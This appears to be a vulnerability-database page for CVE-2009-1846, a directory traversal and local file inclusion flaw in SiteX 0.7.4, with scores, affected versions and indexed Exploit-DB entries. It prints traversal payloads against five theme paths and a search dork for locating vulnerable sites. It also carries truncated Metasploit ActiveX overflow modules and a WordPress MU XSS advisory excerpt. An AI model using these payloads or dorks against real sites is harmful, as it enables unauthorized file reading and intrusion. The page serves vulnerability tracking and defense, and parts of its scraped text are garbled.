CVE-2009-1846
Published 2009-06-01
Priority: P3 (41) · high · 7.5 (CVSS 2.0)
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 2.30% (81.1th percentile)
Multiple directory traversal vulnerabilities in SiteX 0.7.4 Build 418 and earlier allow remote attackers to include and execute arbitrary local files via a .. (dot dot) in the THEME_FOLDER parameter to (1) Corporate/homepage.php, (2) Fusion/homepage.php, (3) Joombo/homepage.php, (4) Streamline/homepage.php, and (5) Structure/homepage.php in themes/.
Affected
8 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| bjsintay | sitex | <= 0.7.4 | — |
| bjsintay | sitex | — | — |
| bjsintay | sitex | — | — |
| bjsintay | sitex | — | — |
| bjsintay | sitex | — | — |
| bjsintay | sitex | — | — |
| bjsintay | sitex | — | — |
| bjsintay | sitex | — | — |
No detection rules found.
Exploit-DB
Symantec ConsoleUtilities - ActiveX Control Buffer Overflow (Metasploit)
exploitdb·2010-11-11
CVE-2009-3031 Symantec ConsoleUtilities - ActiveX Control Buffer Overflow (Metasploit)
---
##
# $Id: symantec_consoleutilities_browseandsavefile.rb 10998 2010-11-11 22:43:22Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Symantec ConsoleUtilities ActiveX Control Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in Symantecs ConsoleUtilities.
By sending an overly long string to the "BrowseAndSaveFile()" method located
in the AeXNSConsoleUtilities.dll (6.0.0.1846) Control, an attacker may be able to
execute arbit
Exploit-DB
Symantec ConsoleUtilities - ActiveX Buffer Overflow (Metasploit)
exploitdb·2009-11-02
CVE-2009-3031 Symantec ConsoleUtilities - ActiveX Buffer Overflow (Metasploit)
---
##
# Use it only for education or ethical pentesting! The author accepts no liability for damage caused by this tool.
##
require 'msf/core'
class Metasploit3 'Symantec ConsoleUtilities ActiveX Control Buffer Overflow',
'Description' => %q{
This module exploits a stack overflow in Symantecs ConsoleUtilities.
By sending an overly long string to the "BrowseAndSaveFile()" method located
in the AeXNSConsoleUtilities.dll (6.0.0.1846) Control, an attacker may be able to
execute arbitrary code.
},
'License' => MSF_LICENSE,
'Author' => [ 'Nikolas Sotiriu (lofi)' ],
'Version' => '1.0',
'References' =>
[
[ 'CVE', '2009-3031'],
[ 'URL', 'http://sotiriu.de/adv/NSOADV-2009-001.txt' ],
[ 'URL', 'http://www.symantec.com/business/sec
Exploit-DB
SiteX 0.7.4.418 - 'THEME_FOLDER' Local File Inclusion
exploitdb·2009-05-27
CVE-2009-1846 SiteX 0.7.4.418 - 'THEME_FOLDER' Local File Inclusion
---
=-=-local file include-=-=
script:SiteX_074_build_418.zip
Author: ahmadbady
my site :Coming Soon
download from:http://sourceforge.net/project/showfiles.php?group_id=121558&package_id=290027
vul:/themes/themes_folders/homepage.php
<?PHP
include("themes/$THEME_FOLDER/header.php"); // line 2
--
xpl:
path/themes/Corporate/homepage.php?THEME_FOLDER=../../../boot.ini%00
path/themes/Fusion/homepage.php?THEME_FOLDER=../../../boot.ini%00
path/themes/Joombo/homepage.php?THEME_FOLDER=../../../boot.ini%00
path/themes/Streamline/homepage.php?THEME_FOLDER=../../../boot.ini%00
path/themes/Structure/homepage.php?THEME_FOLDER=../../../boot.ini%00
dork:"Powered by SiteX 0.7 Beta"
# milw0rm.com [2009-05-27]
Exploit-DB
WordPress MU < 2.7 - 'HOST' HTTP Header Cross-Site Scripting
exploitdb·2009-03-10
CVE-2009-1030 WordPress MU < 2.7 - 'HOST' HTTP Header Cross-Site Scripting
WordPress MU
ID );
if( count( $all_blogs ) > 1 ) {
$primary_blog = get_usermeta($current_user->ID, 'primary_blog');
?>
userblog_id ?>'userblog_id ) echo ' selected="selected"' ?>>http://domain.$blog->path ?>
"
http://www.example.com/wp-admin/profile.php> tmp.html
$ firefox tmp.html
The javascript code will be executed in the context of the victim
browser, this can be exploited to steal cookies and escalate
privileges to administrator.
Tested with Wordpress MU 2.6.5, Apache 2.2 and Mozilla Firefox 3.0.6
V. BUSINESS IMPACT
The impact is the attacker can gain administrator privileges on the
application.
VI. SYSTEMS AFFECTED
Versions prior to 2.7 are affected
VII. SOLUTION
Upgrade to version 2.7 of w
No writeups or analysis indexed.